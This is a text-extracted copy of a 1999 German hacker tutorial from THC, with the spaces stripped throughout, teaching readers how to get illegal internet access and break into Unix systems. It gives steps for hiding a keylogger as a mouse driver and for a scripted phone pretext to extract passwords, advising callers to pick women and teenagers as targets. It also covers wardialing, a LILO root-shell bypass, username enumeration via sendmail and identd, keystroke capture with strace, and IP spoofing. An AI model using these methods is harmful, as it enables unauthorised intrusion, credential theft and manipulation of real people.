You are on page 1of 42

2/26/2016

HumantoHackerVersion1.1

VomMenschenzumUnixHacker
Author:TICK/THC
LastUpdate:19990704
Email:T_I_C_K@gmx.net

Inhaltsverzeichnis
1.
2.
3.
4.

Vorwort
Voraussetzungen
Wiebekommeich(illegalen)ZugangzumInternet?
DieLiteratur:

DerunangenehmeTeil
oder:
DerSchluesselzumErfolg
5. Wiekommeichweiter?
6. WieretteichmeinenArsch?
7. EinpaarGedankenzumSeineinesHackers
8. Yeah,timetobecome31337.
https://www.thc.org/papers/h2h.htm

1/42

2/26/2016

HumantoHackerVersion1.1

9. EinBlickueberdieSchulter
10. PersoenlicheSicherheit
11. LetzteWorte
12. WichtigeLinks
13.Tools

Vorwort
AuchwennesfuereinenAnfaengerhartist,aberichwerdegewisseDingewieNIS,Passwordcracker,Packetsniffer,etceteranicht
erklaerenichsetzesiealsbekanntvoraus.WenndumitdiesenDingenarbeitest,dannwirstdusieverstehen,undindenBuechern/Docs
werdensiehaeufigaucherklaert.
Zeilen,diemitdemGroesseralsZeichen'>'beginnensindEingaben(vondir).
Zeilen,diemitdemKleineralsZeichen'<'beginnen,stellenAusgaben(z.B.voneinemProgramm)dar.
Befehlewerdenfettgedruckt,CapturesrotundFilenamengruenindiziert.
BittesendetalleVerbesserungen,Erweiterungen,AnregungenundintelligentenFragen
anmeineEmailAdresse.
DiesesPapersollkeineAufforderungzumHackensein!
Fornongermanguys:
Sorry,butI'mtoolazytotranslatethistexttoenglish.
ButmaybesometimesI(orsomeoneelse)will.

Voraussetzungen
Jagut,dieVoraussetzungenumHackerzuwerden....also,dasWichtigsteisteineisernerWilledumusstHackerwerdenwollen,mitjeder
ZelledeinesKoerpers)abernichtverkrampfen,denndannwirdderFlussderPhantasieblockiert).EinIQ>=100waer'auchganz
sinnvoll...hm,aja,'nComputerund'nModem...sinddeineHauptwerkzeuge.DusolltestinCprogrammierenkoennen,daauf(fast)jedem
UnixSystemeinCCompilerinstalliertistunddergroessteTeilderSourcecodesinCgeschriebenist.IchwerdeimVerlaufdiesesArtikels
einBuchvorstellen,dasmeinerMeinungnacheinesehrguteundumfassendeGrundlagefuer'sProgrammiereninCbietet,fallsduschon
eineHochsprachebeherrschstunddireinigeszutraust,dannreichtes,einBuchueberUnixSystemprog.zulesen.
DesweiterenistessinnvolleinUnixaufdeinemRechnerzuinstallieren,z.B.Linux(fuerAnfaengerwuerdeichSuSELinuxempfehlen,es
istgutdokumentiertundzudemeinfachzuinstallieren)oderFreeBSD(istimGegensatzzuLinuxeinechtesUnix,daesvonden
urspruenglichenQuellenabstammt).EsgibtnochweitereUnixesfuerx86erwieBSDI,OpenBSD(sehrsicherunduserunfreundlich...ein
https://www.thc.org/papers/h2h.htm

2/42

2/26/2016

HumantoHackerVersion1.1

echtesMaennerBetriebssystem*G*),Solarisx86,SCOetc.aberdasbrauchtdichersteinmalnichtzuinteressieren.)
BisdueinerfahrenerHackerbistkoennenselbstbeigrossemEngagementeinigeJahrevergehen.

Wiebekommeich(illegalen)ZugangzumInternet?
AlsomirkommenjetztmehrereMoeglichkeitenindenSinn,ichwerdemalmitderMethodebeginnen,dieichauchverwendethabe
sozusagendie,dieihrenPraxistestschonbestandenhat.
SuchdireinenetteUni(InternetProvider,FirmamitInternetAccess)indeinerNaeheausundmachedorteinPraktikum,einenFerienjob
odereinenNebenjob.
WaehrenddeinerTaetigkeitimmerschoendieAugennachRechnernoffenhalten,dieansUniNetzangeschlossensind,dievonden
Studentengenutztwerdenundallgemeinzugaenglichsind.HaeufigstehtirgendwoeinalterDOSPCrum,oderesexistierenPCPools.
SuchdireinenRechnerausundsieh'dirseinenAufbaugenauan(autoexec.bat&config.sys...).Beobachtewieerbenutztwird(laeufter
staendig,wirdernachtsausgeschaltet).Lassdichmalganzplumpvon'nemStudentenindieBenutzungdesRechnerseinweisen.Dann
benutzediesenRechnerfueranonymousFTP,HTTPunddenganzenKram,derkeinPassworterfordert,undwennsichdieGelegenheitmal
bietet,dannkopieredirdieautoexec.bat,config.sysunddenStammverzeichnisbaum(tree)auf'neDiskette.
KommenwirjetztzumspannendenTeil.EsgehtdarumeinTSRProgrammzuinstallieren,welchesdieTastatureingabenineineDatei
protokolliert.UmdiesesTSRProg.sogutwiemoeglichzuversteckentarntmanesalseinanderesProg.undfuegteinenentsprechenden
Eintragindieautoexec.batein.Mankannz.B.denMouseTreiberdurcheinerBatchDateiersetzen,dieerstunserTSRunddannden
MouseTreiberaufrufto.ae..WenndufitinASMProgrammierungbist,dannkannstdudasTSRvormemverstecken(ichglaube,indem
manirgendwie'neMemorygrenzeveraendertkeineAhnung).
UnterUmstaendenmussmandasTSRmiteinemHEXEditorseinenAnforderungenanpassen.Dusolltestbedenken,dassdieProtokolldatei
denganzenPlattenplatzaufzehrenkoennte,alsotaeglichdieDateiaufDiskettebringenundvonderPlatteentfernen.Desweiterenmuessen
dieTimestampsangepasstwerdenja,ParanoiaistdieLebensversicherungeinesHackers.
So,umdieganzeAngelegenheitzubeschleunigentippejeweilseineBatchDateifuerdieInstallationdesTSRs,fuerdasmove'nder
ProtokolldateiundzumDeinstallierendesTSRsundzurWiederherstellungdesOrginalzustandes(Timestampsnichtvergessen).Testedeine
StrategieunddeineBatchDateienaufdeinemRechner,inderPraxisdarfeskeineFehlermehrgeben,allesmussschnellundreibungslos
verlaufen.
InterpretationderProtokolldatei:
Wennduz.B.folgendessiehst:
ftpblah.am.arsch.de
franz
schwanz
...dannexistiertaufdemRechner"blah.am.arsch.de"einAccountmitdemLogin"franz"unddenPasswort"schwanz"vorausgesetzt,dass
dieEingabenrichtigwaren:).
https://www.thc.org/papers/h2h.htm

3/42

2/26/2016

HumantoHackerVersion1.1

WichtigsindfuerdicherstmaldieRechnerimUniNetz.
WenndueinpaarAccountsgesammlthast,musstdudieTelefonnummerdesModemsrausfinden,diedichmitdemNetzderUniverbindet.
DieNummerbekommstduganzeinfach:Ruf'beiderUnian,gibdichalsStudentausundfrag'nachderNummerdumusstsicherund
ruhigsprechen.HaeufigstehtdieNummerauchin'nemInfoblattvomRechenzentrum(RZ)oderaufderenWebSite.
DieBequemlichkeitbeimVerwaltenundVerwendenvonAccountInformationenkommtdirbeimEinloggenzugute,undzwaristes
(meistens)voelligegalaufwelchemRechnerimUniNetzdulandest,dennvieleUserverwendendasselbePasswortaufmehreren
Rechnern(auchinanderenDomains)odereswirdNIS(oderNIS+,rdist,DCE,CORBAetc)benutzt
So,wennduindemSystembist,dannmachedichdamitvertraut(inUniSystemenfaelltmannichtsoschnellauf).
VonderUniaus,kannstdudannamBestennochDomainshacken,dieindeinemCityTarifBereichliegenumdeineTelefonkostenzu
verringernauchwenndiegehackteUniimCityTarifBereichist,dennjemehrEinwahlpunkteduzumInternethastumsobesser.
DukannstdeineTelefongebuerenauchsparen,indemdu'nePBXhackst(im0130/0800/0180*BereichodervonlokalenFirmen)oder
durchBlueboxingistmirpersoenlichzugefaehrlichundzuauffaellig,dadieTelekomgernePhreakerkennenlernenwillundPBXs
meistensguteIntrusionDetectionSystemsbesitzen.)
BeiFirmenistdieganzeAngelegenheitetwasgefaehrlicheralsbeiUniversitaetenoderFHs.
DesweiterenkannstdunatuerlichaucheinfachindenComputerSystemenTrojanHorseseinbringenoderganzsimpeldenLeutenueberdie
Schultersehen,wennsiesichindieRechnereinloggen.
Die"Experten"untereuchkoenneneinenVampireTapodereinenLaptopmitSnifferinderenNetzeinbringenundsoeinfachdieAccount
Informationenaufzeichnen.
DerVorteildesVampireTapsist,dassesnichtdurchMessgeraeteentdecktwerdenkann,diedieEntfernungbiszumnaechstenEnde/Bruch
imNetzkabelmessen.
UnterWindows(3.11)kannstdudenMacrorecorderzurAufzeichnugderTastatureingabenverwenden...is'abernichtsotoll...machdeine
eigenenErfahrungen,eserfordertaufjedenFallmehrAufmerksamkeitvondir.EinebessereLoesungistdaschoneineveraenderte
WINSOCK.DLLzuinstallieren,diealleDaten,dieuebersNetzgehenaufzeichnet.
NatuerlichkannstduaucheinenaufDOS,Win9?oderNTbasierendenSnifferverwenden.
FallsduschoneinenUnix/NTAccounthast,dannlad'direinfachdiePasswortdateiaufdeinenRechnerundcrackediePasswoerter.
OdereintemporaererFreundmitInternetAnschlusshilftdirweiter.)
WennduphysikalischenZugriffaufeinenLinuxRechnerhast,dermitLILOgebootetwird,
danntippeamLILOPrompthinterdemBootlabelfuerLinux"init=/bin/bashrw"einundderRechnerbootetimSingleUserModeundgibt
direinerootShellohnePasswortabfrage.AndernfallskannstdudenRechnerimmernochmiteinerBootdiskettehochfahren.
IndernachTelekomMonopolundInternetAerabietenvieleTelekomunikationsFirmenInternetzugaengean,dieeinfachdurchdieAngabe
https://www.thc.org/papers/h2h.htm

4/42

2/26/2016

HumantoHackerVersion1.1

dereigenenBankverbindungo.ae.benutztwerdenkoennen.AmBestenihrwerft'nenBlickindenArtikelvonSalpeter(Kommentare
hierzubittenichtanmich).
UndnunnocheinoldschoolWeg.ErerfordertwenigerdentechnischensondernmehrdenphysischenundmentalenAufwand.
Such'direin/eInstitut/FirmamitInternetanschluss(indeinerStadt)aus.JetztmusstduerstmaljedemengeInfosueberdeinZielsammeln,
egalwieunwichtigsieerscheinen.Dubrauchstz.B.denNamendesAdminsundderUser,BeziehungenzuanderenInstituten/Firmen.Um
dieseDingeinErfahrungzubringenkannstdudenMuellderFirmadurchsuchen(sog.DumpsterDiving)oderdichmal'nbisschen
umhoeren.JetztnurnochdieModemnummerherausfinden:
EntwedereinfachanrufenundalsUserausgeben(wenndudenNameneinesKundenhast,dannbenutzeihnauch),derdieNummer
vertroedelthat,ausgebenoderdenTelefonnummernbereichdeinesZielsdurchscannen.
DasScannengehtwiefolgt:
DuwaehlsteineNummerundhorchstobeinModemdranhaengtdieseAufgabekannaucheinProg.uebernehmen.VieleFirmenbelegen
mitihrenTkAnlagen(mankoenntenatuerlichauchdieTKAnlagezuseinemVorteilmanipulieren,aberdiesesThemasollnicht
BestandteildiesesPapersseinundwuerdeauchvielzuweitfuehren)einenbestimmtenNummernbereich,z.B.eine6stelligeNummerwobei
dieersten3Zahlenstatischsind(z.B.911)unddieletzten3Zahlenvariieren(0bis999wobei0meistensdieTelefonzentrale,Pforte,etc
ist).NunwaehlstdualleNr.von9110bis911999bisdueinModemgefundenhastfallsdueinAnrufbeantworterentdeckst,dann
versucheihnzuhacken(weitereInfos).
DukannstdenScanBereicheinschraenkenindemdudirdieDurchwahlnummerdesRZs,DVZs(Datenverarb.Zentrum)oderwiesonst
dieAbteilungfuerdieRechnerverwaltungheisstgebenlaesstunddannvondortstartest(Bsp.:Durchwahl:345,dannfaengstdubei911
300an).
SojetztAccountsbesorgen.
RufeeinenUserandabeisolltestdufolgendesbeachten:
1.suchediramBestennurFrauen
oderJugendlicheaus,dadiesePersonenleichtglaeubigerundtechn.wenigerversiertsind.
(keinSexismus,reineErfahrung:))
2.keinedirektenMitarbeiterderFirma
3.abendsanrufen(zw.19.00und21.00)
...so,nehmenwirmalan,dassderAdminderFirmaHAQ_MEMarkAbeneundderUserKathrinMitnickheisstundgehenwirdavonaus,
dassdudenUsernamenkennst,dannkoennteeinGespraechfolgendermassenablaufen:
MA:GutenAbend,hiersprichtMarkAbene,ichbinderComputerAdministrator
vonHAQ_ME.KoennteichwohlbitteKathrinMitnicksprechen?
KM:Ja,amApparat.
MA:Ohgut,undzwarfolgendes,wirhattenGesternaufunseremInternetServer
einenGangBangundunssindeinigeDatendabeiverlorengegangen,darunter
auchdieUserdaten...
KM:OhGott,wieschrecklich.
https://www.thc.org/papers/h2h.htm

5/42

2/26/2016

HumantoHackerVersion1.1

MA:...ja,ja,undichhab'dieAufgabedieDatenvon
unserenBackupbaendernzurestaurierenunddieUserDatenbankwieder
neueinzurichten.
KM:Aha...
MA:UmmeineAufgabezukomplettierenundihnenwiederdieeinwandfreie
BenutzungihresInternetzugangszugewaehrleistenmuessteichwissen
obsieihrenaltenUsernamen,kathrin,wiederverwendenwollen.
KM:Ohja,natuerlich.
MA:Ok,...undwielauteteihrPasswort?
KM:Was!?MeinPasswort,warumhabensiedavonkeineSicherungskopien
angefertigt?
MA:Oh,esistschoensosicherheitsbewussteUserzuhaben,aberleider
selten.
AufgrundunserhohenSicherheitsanspruechewirdvonderUser
DatenbankkeineKopieangefertig...stellensiesichmalvor,dass
dieBackupbaendergestohlenwerden.
KM:Ohja,siehabenrecht.AlsogutmeinPasswortwar"nirhtak".
MA:Ok,...dankesehr.
Aufwiederhoeren.
KM:Tschuess.

VielgeredetfuernureineinzigesWort,abereshatsichgelohnt.Dumusstjederzeiternstundruhigklingen.DiesesGeredeistsog.Social
Engeneering.
Solltees,auswelchenGruendenauchimmer,nichtklappen,dannkannstduaucheinProg.verwenden,dasdasPasswortraet.Vielleicht
funktionierenauchsog.DefaultAccounts(z.B.Login:guest&Password:guest).

DieLiteratur
NachfolgendfindestdueinekleineTabellemitBuechern,diedulesensolltest.

Autor
Titel
Verlag
Kommentar
GerhardWillms
DasCGrundlagenBuch DataBecker DasFundamentderCProgrammierung
Unix
MeinerMeinungnachdasbesteBuchfuerUnix
Nemeth,Snyder,
Systemadministration
PrenticeHall Systemadministration
Seebass,Hein
Handbook
(einedt.Auflageistaucherhaeltlich)
MalwiedereinperfektesWerk.
Programmierunginder
Addison
StevensschreibtdiebestenBuecherfuerUnix/Internet
W.RichardStevens
UnixUmgebung
Wesley
Programmierung
https://www.thc.org/papers/h2h.htm

6/42

2/26/2016

HumantoHackerVersion1.1

ProgrammierenvonUnix
Netzen
TCP/IPIllustratedVol.
W.RichardStevens
1/2/3
W.RichardStevens

PrenticeHall
2teAuflage
/Hanser
Addison
InfosueberdasTCP/IPProtokolunddessenImplementierung
Wesley
sehrwichtig

Garfinkelund
Spafford

PracticalUnix&Internet
O'Reilley
Security

DasbesteBuchinSachenUnix&Internet
Sicherheit

Chapmanund
Zwicky

EinrichtenvonInternet
O'Reilley
Firewalls

beschreibtdenAufbauvonFirewalls
leidernichtuptodateabertrotzdemsehrgut

Cheswickund
Bellovin

FirewallsundSicherheit
imInternet

Addison
Wesley

EbenfallsFirewalls
aufbau,aberetwastheoretischer
undzeigtuebersichtlichmoeglicheSchwaechenauf.

BruceSchneier

Angewandte
Kryptographie

Addison
Wesley

BruceSchneierhatbeidemBuchganzeArbeitgeleistet.Esistsehrgutzu
lesenundenthaeltvieleInformationen

ElectronicFrontier
Foundation

CrackingDES

O'Reilley

LinuxKernel
Programmierung

Addison
Wesley

WichtigeInfosueberdenLinuxKernelwerdenhierleichterklaert.
Ganznuetzlich,wenndumaldieLinuxFirewallevaluierenwillst.)

Na?'NeMengePapier.AbereslohntsichwirklichdenganzenKramzulesen,glaubmir.EsgibtaucheinigewenigeguteDocsvonAdmins
undHackernsieersetzenabernichteingutesBuch.
DusolltestauchdieSecurityPaperslesen,dieimCOASTArchivoderbeiRootShellliegen...unddieUSENIXVeroeffentlichungennicht
zuvergessen.

Wiekommeichweiter?
DusolltestdireinenlegalenInternetZugangbesorgen.
AnschliessendschreibstdudichinUnix&InternetSecurityMailinglistenein.HierwerdenHinweiseaufBugsinProgrammenund
DienstengegebenundzusaetzlichauchnochkleineCProgrammeoderShell/PerlSkriptemitgeliefert,diedieseBugsausnutzen.
TrotzdieserBequemlichkeitsolltestdudieoldschoolMethodenwieTrojanHorses,etcnichtvergessenbzw.selbstdeinGehirnbenutzen.

Adresse
Subject
Body
bestofsecurityrequest@suburbia.net
listserv@netspace.org
https://www.thc.org/papers/h2h.htm

subscribebestofsecurity
subscribebugtraq
7/42

2/26/2016

HumantoHackerVersion1.1

majordomo@lists.gnac.net
fwallusersrequest@tis.com(???)
majordomo@nsmx.rutgers.edu

subscribefirewalls
subscribefwallusers
subscribewwwsecurity

DesweiterenkannstdueinigeNewsgroupsmitlesenaberesistvielMuelldabeiundindenHackerNewsgroupsistschonmalgarnichts
zuholen.
Ok,gehenwirmaldavonaus,dassdurootRechtehast.EineMoeglichkeitumweitereNetzezuhackenbestehtdarinaufdemlokalen
SystemnachDateienwie.rhosts,.netrcund.forwardzusuchenoderEMailnachPassworten(oderandereninteressantenInformationen)
zudurchforsten.UmdirdieArbeitueber20.000Userzuchecken(undbeimGebrauchvonNFSnochzusaetzlichdieUIDzuwechseln)
abzunehmenhabicheinkleinesToolnamensSearchergeschrieben.
WennduvoneinigenUserndasPasswortgecrackthast,dannsolltestduguckenvonwelchenHostssiesicheinloggen,dazukannstdulast,
woderaehnlichesbenutzen,dukoenntestauchdieHostsaufsKornnehmenindiesiesicheinloggen,herausfinfenkannstdudasz.B.mitps
(mitwOption),netstat,oderduverifizierstdieMailAliases(/etc/aliases)bzw..forwardumzusehenwohineinUserseineEMailumleitet.
JetztsolltestdunochherausfindenwelchenUsernameneraufdementferntenHostbenutzt(in.forwardundin/etc/aliasesmusses
angegebenwerdenz.B."remoteuser@othersite.com"),dazukannstduSMTPverwenden...Bsp.:User"victim"aufdemlokalenSystem
(Realnamen:HackersVictim)hatsichmittelnetaufdemRechner"host.account.edu"eingeloggt.
>telnethost.account.edu25
<Trying123.10.0.1...
<Connectedtohost.account.edu.
<Escapecharacteris'^]'.
<220host.account.eduSendmail8.6.9/8.6.9readyatMon,21Jul1997
<16:19:56+0200
<220ESMTPspokenhere
>vrfyvictim
<550victim...Userunknown
>vrfyhvictim
<250HackersVictim<hvictim@host.account.edu>
>quit
<221host.account.educlosingconnection
<Connectionclosedbyforeignhost.

DerUserverwendetalsoaufbeidenHostsnichtdenselbenUsernamen,dadasKommando"vrfyvictim"vonSendmail(weitverbreitetesE
MailVerteilungsProgramm,dasanPort25haengt)mit"550victim...Userunknown"beantwortetwird.
JetztkannstdueinigeKombinationen(z.B.ausdenInitialendesUsers)ausprobieren...BINGO!..."hvictim"istderUsername,den"victim"
auf"host.account.edu"benutzt.
BeivielenMailservernwurdedasvrfyKommandoausSicherheitsgruendenabgeschaltet.Jetztkoenntestdunurnochversuchenden
Usernamenzuerraten,indemduEMailsandenServerschickstunddieErrorMessagesdesServersueberpruefst,diedufuernicht
vorhandeneUserzurueckbekommstdiesesVerfahrenistnichtgeradesehrunauffaellig,alsoauchnichtzuempfehlen.
https://www.thc.org/papers/h2h.htm

8/42

2/26/2016

HumantoHackerVersion1.1

Dukannstauchnochfinger(wirdaberausSicherheitsgruendenhaeufignichtangeboten)oderaberrusersbenutzenumalleeingeloggten
Userauf"host.account.edu"zuerfragen.MitfingerkannstduauchLoginnamenerraten,dafuerschreibstdueinfacheinShellScript,das
auseinemDictionarybiszunWoertereinliehstundenblocanfingerdschickt.
FallsdukeinenErfolghabensolltestoderdieseDienstenichtangebotenwerdenbistduimmernochnichtverloren.WennderUsergerade
eingeloggtist,dannrufedasProgrammnetstat(dientunteranderemzumDebuggenvonNetzwerkproblemen)auf.
>netstat
<ActiveInternetconnections
<ProtoRecvQSendQLocalAddressForeignAddress(State)
<User
<victim
<tcp00localhost:1032host.account.edu:telnetESTABLISHED
<root
<udp00localhost:3043*:*
<ActiveUNIXdomainsockets
<ProtoRefCntFlagsTypeStatePath
<unix1[ACC]SOCK_STREAMLISTENING/tmp/gpmctl
<unix2[]SOCK_STREAMCONNECTED/dev/log
<unix2[]SOCK_STREAMCONNECTED
<unix2[ACC]SOCK_STREAMLISTENING/dev/printer
<unix2[]SOCK_STREAMCONNECTED/dev/log
<unix2[]SOCK_STREAMCONNECTED
<unix1[ACC]SOCK_STREAMLISTENING/dev/log

DieaktivenUnixDomainSocketsinteressierenhiernichtvonInteresseistnur...
<ActiveInternetconnections
<ProtoRecvQSendQLocalAddressForeignAddress(State)
<User
<victim
<tcp00localhost:1032host.account.edu:telnetESTABLISHED

...hierkannstdusehen,dassderUser"victim"eineVerbindungvomPort1032deslokalenHostszumTelnetPort(23,sieheFile
/etc/services)von"host.account.edu"(derHostnamewirdbeiUeberlaengeabgeschnittendukannstdirmitderOption"n"auchdieIP
Adresseanzeigenlassen)aufgebauthat.Jetztweistdugenugumeinkleines"Authentifikationsprogram"(identd)fuerdeineZweckezu
misbrauchen.KurzwaszureigentlichenVerwendungvon
identdwirdvonV8SendmaildazubenutztumgefaelschteEMailszuentschaerfen,indemsendmailidentdbefragtwelcher
identd:
UsergeradeeineVerbindungzuihmaufgebauthat.(DasFormatfueridentd:Server/RemotePort,Client/LocalPort)
Losgeht's!BaueineTCPVerbindungzumPort113(hierlauschtidentd)von"host.account.edu"auf.
>telnethost.account.edu113
<Trying127.0.0.1...
https://www.thc.org/papers/h2h.htm

9/42

2/26/2016

HumantoHackerVersion1.1

<Connectedtohost.account.edu.
<Escapecharacteris'^]'.
>23,1032
<23,1032:USERID:UNIX:hvictim
>Connectionclosedbyforeignhost.

Jupp,dais'es"hvictim".
FallsderTyprloginoderrshbenutzt,dannsieh'dirmaldieProzessListean,psauw|grepvictimfuerBSDDerivateundpsef|grep
victimfuerSysV(AT&T)Unix.VonInteressefuerunsisthierdie'l'OptionderBefehle,damitgibtmandenUsernamenaufdemRemote
Hostan(dasselbegiltauchfuerSecureShellssh).WennduzwardieebengenanntenClientProgrammeinderProzesslistesiehst,aberdie
'l'Optionfehlt,dannsinddieUsernamenaufbeidenRechnerngleich.
Desweiterenkannstdu,wenndudenSourceCodevontelnetbzw.telnetdfuerdasOSdeslokalenRechnershast,denCodesoveraendern,
dassdieAccountInformationenfuerausgehendebzw.eingehendeVerbindungenaufgezeichnetwerden.
DieeffektivsteundaucheinfachsteMethodeisteinenEthernetSnifferzuinstallieren.DerSniffersetztdieNetzkarteindenPromiscuous
ModeundkannsoallePakete,diesichinseinerCollisionDomainbefinden,aufzeichnen.AmBestensiehstdudirmaldenCodeunddie
Docu.svon'nemSnifferanundspielstetwasdamitherum.
DasSniffenfunktioniertnichtbeiATMundbei10BaseT/100BaseTNetzen(mitintelligentemSwitchnaja,aberauchhiergibtesMittel
undWege*evilG*)...undbeiFDDIundTokenringNetzengeht'snurteilweise.
DieMethodemitdemSnifferisteinepassiveAttacke.AktiveAngriffewie(Blind)IPSpoofing,TCPHijacking...sindetwaskomplizierter
undichwerdesiehiernurkurzerleutern.

Methode
Beschreibung
HierbeibenutztmaneinefalscheIPSourceAdresseundversuchteineTCPVerbindungaufzubauen.
Eswirdder'TrustedHost'MechanismusderBSDrDienste(meistensrlogind)ausgenutzt,dieser'Sicherheits'Mechanismus
erlaubtZugriffanhandderIPSourceAdresse,eswirdkeinPasswortbenoetigt(solltedasSniffenvonPasswoertern
verhindern).
BlindIP
DiegrosseKunstbeidieserFormderAttackebestehtdarindieTCPSequencenummer(s.RFC793)richtigzuraten(daman
Spoofing
dieIPSrc.gefaelschthatbekommtmandieTCPSeq#desentferntenHostsnichtzuGesichtesseidenn,manbenutztdieIP
Src.AdresseeinesHosts,dersichinderselbenCollisionDomainbefindet).
BeialtenSystemenistdas"Raten"relativeinfach(64KRule)aberbeineuenSystemenistesnahezuunmoeglich,dasieihre
TCPSeq#random(naja,haeufigistderAlgorithmusseltenwirklichrandom,fuehrthierabermalwiederzuweit)erstellen.
DerVorteildieserAttackeist,dassmanimGegensatzzur'blinden'VersiondieTCPSeq#unddieDatensieht.Einwieterer
Vorteilist,dassmehrereMoeglichkeitenexistieren.
1.IPSourceRouting+AliasInterface
https://www.thc.org/papers/h2h.htm

10/42

2/26/2016

Non
BlindIP
Spoofing

HumantoHackerVersion1.1

DieseMethodeissehreinfachzurealisieren,eswerdeneinfachalleRouter,diedasPacketpassierensollimIPHeader
alszusaetzlicheOptionangegeben...
Tja,aberdasDummeist,dassderrlogindueberprueftobzusaetzlicheOptionenimIPHeadergesetztsind,undwenn
demsoist,dannwirddasPacketirgnoriertundeineLogmessageansyslogduebergeben(jedenfallswirdesinderBSD
VersiongemachtundichdenkeSysVmachtesauch).
ZuallemUeberflussdroppenmittlerweilediemeistenRouterIPPacketsmitderSourceRoutingOption.
2.Dergespoofte/zuattackierteHostbefindetsichinderselbenCollisionDomainwiedeinHost.Somitkannstdualle
PacketesehenindemdudeineEthernetkarteindenPromisc.Modeschaltest(s.Sniffer).
3.DuhastdenISPdesNetzesgehackt,andemdergespoofte/attackierteHosthaengt.Eskann(generell)wiezuvor
verfahrenwerden.
4.OderARPReplySpoofingistsehreinfachundkompfortabel...
DuerzaehltstdemzuhackendenRechnereinfach,dassdiegespoofteIPzudeinerHardware/EthernetAdressegehoert,
indemdudasIP/HWPaarmitHilfeeinerARPMessageinseinemARPCacheeintragenlaesst.
IstleidermalwiedernuraufCollisionDomainsbeschraenkt.
5.DieRoutezwischengepsooftemHostundattackiertemHostgehtueber'deinen'Router.
DasSchoensteistnatuerlich,wennderRoutereineUnixMaschineistaufderdurootRechtebesitztunddieRouteper
defaultueberdeinenRouterlaeuft.Naja,meistensisteskeineUnixMaschinesonderneinCisco,3Com,Ascend,
LivingstonPModersonstwasunddumustdieRouteerstueberdeinenRouterredirecten(spoofeEGP/RIPMessages,
odervielleicht(wenn'dein'NetzunddaszuattakierendeNetzdirektamselbenBackbonehaengen)ICMPRedirect
Messages)

HierbeigehtesdarumeinebestehendeTCPVerbindungzuuebernehmen.
DabeiergibtsichdasgleicheProblemwiebeimNonBlindIPSpoofing:manmussirgendwieindieRoutederbeidenRechner
TCP
kommenumdieTCPSeq#mitzulesen.
Hijacking
WennmandieVerbindunguebernommenhatkannmanz.B.ShellCommandsindenDatenstromeinfuehgen,diedannauf
dementferntenHostausgefuehrtwerden.
BeidenIPSpoofAttacken,mussdaraufgeachtetwerden,dassderHost,dessenIPAdressemanspooft,nichtaufdiePaketedesgefoolten
Hostsantwortenkann(hierzubenutztmaneineDoS(DenialofService)Attacke),denndieAntwort(derTCPStackgenerierteinTCPRST
Packet,daernichtsmitdenempfangendenPaketenanfangenkann)wuerdedenTCPStackdesattackiertenRechnersdazubringendieTCP
Connectionsofortzubeenden...undwerwilldasschon?
Drei"Sniffer"TechnikenerlaubenessogarverschluesselteVerbindungen(z.B.mitSSH)imKlartextaufzuzeichnen(bzw.Daten
einzugeben).DabeihandeltessichumTTYHijacking,Process(bzw.Systemcall)TracingunddieManintheMiddle(MIM)Attack.Die
erstenbeidenVerfahrensetzendenrootZugriffaufeinemderEndsystemevoraus.
https://www.thc.org/papers/h2h.htm

11/42

2/26/2016

HumantoHackerVersion1.1

BeimTTYHijackinggibtesdieverschiedenstenArten.
Eineinfacher'ioctl()'Aufruf(siehedazudenSourceCodevonSmeagol(s.thcuht1.tgz))erlaubteszeichenweiseDatenindenTTY
Streameinzugeben(abernichtauszulesen).
DasSchoeneandieserMethodeist,dassmannichtunbedingtrootRechtebenoetigt.SEHRalteSystemecheckendie
ZugriffserlaubnisfuerSpecialfilesanhandderr/w/xPermsdesFilesystemsundnichtmitHilfedesKernels.SunOShateinenBug,
dereserlaubtselbstnonrootUserneinenFiledescriptorfuerSpecialfileszuerhalten.
MankanndieShelleinesUsersdurcheinenPTYWrapperersetzen(PTY=PseudoTerminalType),dadurchkannmanalleEinund
Ausgabenmitlesen.
EinfuehgenvonLKMs(LoadableKernelmodules)erlaubtdasMitschneidenvonEin/AusgabenunddieEingabevoneigenenDaten
durchveraendernvonSTREAMS
DurchdasVerbiegenvonSystemcalls(aehnlichdemVerbiegenvonDOSInterruptsinderIntrVektortabelle,aberwesentlich
einfacher)koennenEingabenaufgezeichnetwerden.
Ok,kommenwirzumTracenvonSystemcalls.
EswirdeigentlichbenutztumProgrammezudebuggen.MankanndenAufrufvonSystemcalls(undSignals)incl.Parameternverfolgen.
Dascooleist,dassvieleUnixDerivateueberdiesesFeatureunddenentsprechendenToolsverfuehgen.
UnterLinuxheisstdiesesProgrammstrace(SunOS:trace,Solaris:truss,IRIX:par).
Ok,alserstesmuessenwirunseinOpferaussuchen,d.h.dieShelleinesUsers(odernatuerlichaucheinebereitsbestehendeVerbindungmit
telnet,rlogin,ssh...).Dazubenutzenwirps.
>ps
<PIDTTYSTATTIMECOMMAND
<69v04SW0:00(agetty)
<70v05SW0:00(agetty)
<257v06SW0:00(agetty)
<599v02S0:00bash
<707v03S0:00bash
<744v02R0:00ps

So,wirnehmenunsmaldiebashmitderPID707vor.WirrufenstracemitderOption'f'aufumauchdieChildProzessederbash,wie
z.B.telnet,zutracen.EinegrosseMengederAusgabenvonstracehabeichherausgeschnittenumdieLesbarkeitzuverbessern.
>stracefp7072>&1|egrep"read|recv|write|send|exec|socket|connect"
<Process707attachedinterrupttoquit
<read(0,"t",1)=1
<write(2,"t",1)=1
<read(0,"e",1)=1
<write(2,"e",1)=1
<read(0,"l",1)=1
https://www.thc.org/papers/h2h.htm

12/42

2/26/2016

HumantoHackerVersion1.1

<write(2,"l",1)=1
<read(0,"n",1)=1
<write(2,"n",1)=1
<read(0,"e",1)=1
<write(2,"e",1)=1
<read(0,"t",1)=1
<write(2,"t",1)=1
<read(0,"",1)=1
<write(2,"",1)=1
<read(0,"d",1)=1
<write(2,"d",1)=1
<read(0,"o",1)=1
<write(2,"o",1)=1
<read(0,"o",1)=1
<write(2,"o",1)=1
<read(0,"\r",1)=1
<write(2,"\n",1)=1

HierkoennenwirsehenwiederUsertelnetdooaufruft.Mitread(..)werdendieUsereingabengelesenundmitwrite(..)zumTerminal
desUsersgeschrieben.
<[pid772]:execve("/bin/telnet","telnet","doo",env:["ignoreeof=10",[pid772]:

HiersehenwirnochmalgenauerwelcherChildProzessaufgerufenwurde.
<socket(PF_INET,STREAM,IPPROTO_IP)=3
<[pid772]:connect(3,AF_INET(23,10.0.0.1),16)=0

DerSocketwirderzeugtunddieVerbindung(IPAdresseundPortsindgutsichtbar)wirdaufgebaut.
<[pid772]:write(1,"Connectedtodoo.thehaze.org.\n",32)=32
<[pid772]:write(1,"Escapecharacteris'^]'.\n",26)=26

